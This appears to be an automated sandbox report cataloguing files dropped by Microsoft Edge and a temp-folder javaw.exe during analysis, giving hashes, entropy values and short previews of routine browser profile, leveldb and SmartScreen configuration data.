                                                                                                                                                                                                                                                                                                              Preview:{.. "ArbitrationSignal": "(time_elapsed_since_last_notification)-3600^(notification_quick_dismiss_rate_lower_ci+notification_disable_rate+notification_snooze_rate)",.. "DefaultCohort": {.. "21f3388b-c2a5-4791-8f6e-a4cad6d17f4f.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.BingHomePage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Covid.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Finance.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Jobs.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.KnowledgeCard.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Local.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NTP3PCLICK.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.NotifySearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Recipe.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.SearchPage.Bubble": 1,.. "2354565a-f412-4654-b89c-f92eaa9dbd20.Sports.Bubble": 1,.. "2354565a-f41
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):267
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.30148635744433
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kcAdD1923fQyS/Hrl2KLlmcy2v4q2P923fQyS/HrK+IFUv:BxuLpX4v4F3FUv
                                                                                                                                                                                                                                                                                                              MD5:C4D9994C8D9241EE10125CD4D50201CC
                                                                                                                                                                                                                                                                                                              SHA1:57CD595AC8B6A3446401DB32331F02E1BA6530B4
                                                                                                                                                                                                                                                                                                              SHA-256:DAA35A83A998D8D1DC5F90FBE14BA475F5C7BB368F4652AFEC921127581579B9
                                                                                                                                                                                                                                                                                                              SHA-512:4415B6D570F9E736A640B0F9D822B04645327A4E50A0AED138C691442C6A25D83C2D9CF134B6EEA9E31A680E917F991E468C3C7AAD1759B6DD296E274727FA22
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:54.030 19b0 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db since it was missing..2024/12/22-17:54:54.064 19b0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):126
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.6057778868597197
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:G0XttkJcsRwI9tkJcscml9t3moiOlfmEan:G0Xtqcsqc9Ct3mxKm9n
                                                                                                                                                                                                                                                                                                              MD5:1988A95FC23D528F1C8C4B5CE0065954
                                                                                                                                                                                                                                                                                                              SHA1:C627C94BD48A0B7198EEEB4677C432A5D4BCAD3D
                                                                                                                                                                                                                                                                                                              SHA-256:49A74FC61937AD2EFDFD44E61A392790457C2CEDC5AA5BF21DFC867AAB8DD25F
                                                                                                                                                                                                                                                                                                              SHA-512:D6C03BE1480D6A2FFC875053EDABBC29C3431CD1A61E0C16613F2FA58E35B4949F7D7A286D77464677C776AB2AA19489BC0E51A2022B1CFEDF67B2CB86319CE8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.h.6.................__global... .t...................__global... .9..b.................33_..........................21_.....
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):285
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.261907843853779
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:6:kLd1FD1923fQyS/Hrzs52KLlm7vF34q2P923fQyS/HrzAdIFUv:sv8N9LYvN4v4iFUv
                                                                                                                                                                                                                                                                                                              MD5:DADA2D994D162685C9C77F96EFF1B6D8
                                                                                                                                                                                                                                                                                                              SHA1:F8252766A6181651D75A0677B4699C5F2CFCA2A3
                                                                                                                                                                                                                                                                                                              SHA-256:9222B2F352068DE8FA6A687C2E8F0206BCA4C914B5EFF912AEF39A06E44FA761
                                                                                                                                                                                                                                                                                                              SHA-512:832FCF2E82B36F1CBA366D18A46BDC0126D0744CE7856F8C794CF3A48F51AC530D5D2E2D82C9F8841649CB1D6E087170428BF56432C1C6220739FCA99B352239
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:2024/12/22-17:54:53.750 19b0 Creating DB C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\metadata since it was missing..2024/12/22-17:54:53.970 19b0 Reusing MANIFEST C:\Users\user\AppData\Local\Temp\chr417C.tmp\Default\shared_proto_db\metadata/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):41
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                              MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                              SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                              SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                              SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.7192945256669794
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:NYLFRQI:ap2I
                                                                                                                                                                                                                                                                                                              MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                                                                                                                                                                                                                                                                                              SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                                                                                                                                                                                                                                                                                              SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                                                                                                                                                                                                                                                                                              SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:117.0.2045.47
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1371
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.529436301618216
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:YpQBqDPak7u5rrtLkMbFPB6Fr6yik9JdXBuBuwBFayPnNhR+XcQQQRCYfYg:YuBqDPafWMbFPTUgBzBFDPzR+sFB0
                                                                                                                                                                                                                                                                                                              MD5:B15A20CBDC1E4DAC9EABEB4E7F63F840
                                                                                                                                                                                                                                                                                                              SHA1:1CA549A63831F0B1015A4F3100CBDD57BC194CC5
                                                                                                                                                                                                                                                                                                              SHA-256:B4A340E11B8DC9FA9EA5FD8EDDDEFF4FD9032551719764C2A82E40CF930BE91E
                                                                                                                                                                                                                                                                                                              SHA-512:93E14403555ECEA53E4B1263E7A416D63D65827ADD036381AE98D4222381FD7ADABB2514B555E855AEC244F694E5A3726BDC0EC073AB5D4702827D6D85672BC6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false}},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADD+MzJT60RQbZUlvEJS6UzEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAChodJ9YpuT7JUIrAQi2XE7whngfvq6u/zFwrj4wShr+QAAAAAOgAAAAAIAACAAAADCfcV7Fqc8oAXu4qM4jG4E1ghesDl1MZmDO5uGvnCa8DAAAADJDpmHavXJxw0JmhKAiUv43NamMZBG6kMmwn9xE6c5ug1CYVKLyC3HtQLVGm9lv41AAAAAWZRcA3EYXl677lvyCjcshgv0xIlWsY2FTnzWymDeCRAUlDOxXE1DIKf7XmppLGsD2obA53Q5NkKg9NTZl3vRJw=="},"profile":{"info_cache":{},"profile_counts_reported":"13379381692285050","profiles_order":[]},"smartscreen":{"enabled":true,"pua_protection_enabled":true},"telemetry_client":{"install_source_name":"windows","os_integration_level":5,"updater_version":"1.3.177.11","windows_update_applied":false},"uninstall_metrics":{"installation_date2":"1734908090"},"user_experienc
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.46731661083066856
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:TL1QAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3is25q0S9K0xHZ75fOV:TLiOUOq0afDdWec9sJf5Q7J5fc
                                                                                                                                                                                                                                                                                                              MD5:E93ACF0820CA08E5A5D2D159729F70E3
                                                                                                                                                                                                                                                                                                              SHA1:2C1A4D4924B9AEC1A796F108607404B000877C5D
                                                                                                                                                                                                                                                                                                              SHA-256:F2267FDA7F45499F7A01186B75CEFB799F8D2BC97E2E9B5068952D477294302C
                                                                                                                                                                                                                                                                                                              SHA-512:3BF36C20E04DCF1C16DC794E272F82F68B0DE43F16B4A9746B63B6D6BBC953B00BD7111CDA7AFE85CEBB2C447145483A382B15E2B0A5B36026C3441635D4E50C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):262512
                                                                                                                                                                                                                                                                                                              Entropy (8bit):9.47693366977411E-4
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:LsNlhtKX:Ls3O
                                                                                                                                                                                                                                                                                                              MD5:7C797D38C5CFE6DBBB45ECFB06CA9797
                                                                                                                                                                                                                                                                                                              SHA1:8ECF296AECDE5B118ABF971CFEB68C40B333BC28
                                                                                                                                                                                                                                                                                                              SHA-256:AFFD012195F40FB7C69C4F4DF9DBF257A64AF0774E11295F299C796261C2E1CE
                                                                                                                                                                                                                                                                                                              SHA-512:F70EC5272018CCD61B3FC5904C7DAC8E3BBC0B214AD4475FB3FA44AA0DF148577190DF8D0F16519CC9D52601463C585D43E2E3D3739ABDDC9A3D413459A3104F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):29
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.922828737239167
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:2NGw+K+:fwZ+
                                                                                                                                                                                                                                                                                                              MD5:7BAAFE811F480ACFCCCEE0D744355C79
                                                                                                                                                                                                                                                                                                              SHA1:24B89AE82313084BB8BBEB9AD98A550F41DF7B27
                                                                                                                                                                                                                                                                                                              SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                                                                                                                                              SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:customSynchronousLookupUris_0
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):35302
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):18
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5724312513221195
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:kDnaV6bVon:kDYa2
                                                                                                                                                                                                                                                                                                              MD5:5692162977B015E31D5F35F50EFAB9CF
                                                                                                                                                                                                                                                                                                              SHA1:705DC80E8B32AC8B68F7E13CF8A75DCCB251ED7D
                                                                                                                                                                                                                                                                                                              SHA-256:42CCB5159B168DBE5D5DDF026E5F7ED3DBF50873CFE47C7C3EF0677BB07B90D4
                                                                                                                                                                                                                                                                                                              SHA-512:32905A4CC5BCE0FE8502DDD32096F40106625218BEDC4E218A344225D6DF2595A7B70EEB3695DCEFDD894ECB2B66BED479654E8E07F02526648E07ACFE47838C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:edgeSettings_2.0-0
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3581
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.459693941095613
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                                                                                                                                              MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                                                                                                                                              SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                                                                                                                                              SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                                                                                                                                              SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):47
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.493433469104717
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:kfKbQSQSuLA5:kyUc5
                                                                                                                                                                                                                                                                                                              MD5:3F90757B200B52DCF5FDAC696EFD3D60
                                                                                                                                                                                                                                                                                                              SHA1:569A2E1BED9ECCDF7CD03E270AEF2BD7FF9B0E77
                                                                                                                                                                                                                                                                                                              SHA-256:1EE63F0A3502CFB7DF195FABBA41A7805008AB2CCCDAEB9AF990409D163D60C8
                                                                                                                                                                                                                                                                                                              SHA-512:39252BBAA33130DF50F36178A8EAB1D09165666D8A229FBB3495DD01CBE964F87CD2E6FCD479DFCA36BE06309EF18FEDA7F14722C57545203BBA24972D4835C8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:synchronousLookupUris_636976985063396749.rel.v2
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):35302
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                                                                                                                                              SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                                              MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                                              SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                                              SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                                              SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):86
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQan:YQ3Kq9X0dMgAEwjM
                                                                                                                                                                                                                                                                                                              MD5:961E3604F228B0D10541EBF921500C86
                                                                                                                                                                                                                                                                                                              SHA1:6E00570D9F78D9CFEBE67D4DA5EFE546543949A7
                                                                                                                                                                                                                                                                                                              SHA-256:F7B24F2EB3D5EB0550527490395D2F61C3D2FE74BB9CB345197DAD81B58B5FED
                                                                                                                                                                                                                                                                                                              SHA-512:535F930AFD2EF50282715C7E48859CC2D7B354FF4E6C156B94D5A2815F589B33189FFEDFCAF4456525283E993087F9F560D84CFCF497D189AB8101510A09C472
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":0}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4197
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.485609105031492
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:0q8NkGS1fWMbFPWQ58rh/cI9URoDoto8kBGWsv7jOQ6Jk2ceSDS4S4SDSJI4a:/8NBS/b4eoDU4pTQ2k2x
                                                                                                                                                                                                                                                                                                              MD5:6549DF8E29BAE649CD469F1225C7E91F
                                                                                                                                                                                                                                                                                                              SHA1:E426D740045FAF1366DBFA139A8CDBA7A9191AF1
                                                                                                                                                                                                                                                                                                              SHA-256:EAEA60BE9379D5B190DB57AC38141B399480FCB40749721AADB5C60EAE8221DD
                                                                                                                                                                                                                                                                                                              SHA-512:2CF82CAF8E7067F07EFC3D5CE946F147A53E867D10CE5D4C75B572EBFDAE4FCA8A996BFA44F24BF9E7D49068A3A5108BD89F8BA23A4556C6D5501D2193BDD660
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:{"dual_engine":{"ie_to_edge":{"redirection_mode":0}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADD+MzJT60RQbZUlvEJS6UzEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAAChodJ9YpuT7JUIrAQi2XE7whngfvq6u/zFwrj4wShr+QAAAAAOgAAAAAIAACAAAADCfcV7Fqc8oAXu4qM4jG4E1ghesDl1MZmDO5uGvnCa8DAAAADJDpmHavXJxw0JmhKAiUv43NamMZBG6kMmwn9xE6c5ug1CYVKLyC3HtQLVGm9lv41AAAAAWZRcA3EYXl677lvyCjcshgv0xIlWsY2FTnzWymDeCRAUlDOxXE1DIKf7XmppLGsD2obA53Q5NkKg9NTZl
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\CampaignHardwareLauncher\ddfrt657\bin\javaw.exe
                                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):65536
                                                                                                                                                                                                                                                                                                              Entropy (8bit):1.4224809483946004
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:NkvrXXT58GG2cDvgFHtMPApTLJmsJWTFmwZMbkT6DdiPWUH02UB:NkB8GG2cDvgcAZGNZCw
                                                                                                                                                                                                                                                                                                              MD5:72C89A0C222B7AB5C43CFB8547723DED
                                                                                                                                                                                                                                                                                                              SHA1:3D8F48DF499DFADB7209F0F4C09B549ECD617FE3
                                                                                                                                                                                                                                                                                                              SHA-256:5A176834BC5E202F0F1BF9D9DFBC3613BDC47039335536B357C9F19CF98F45AB
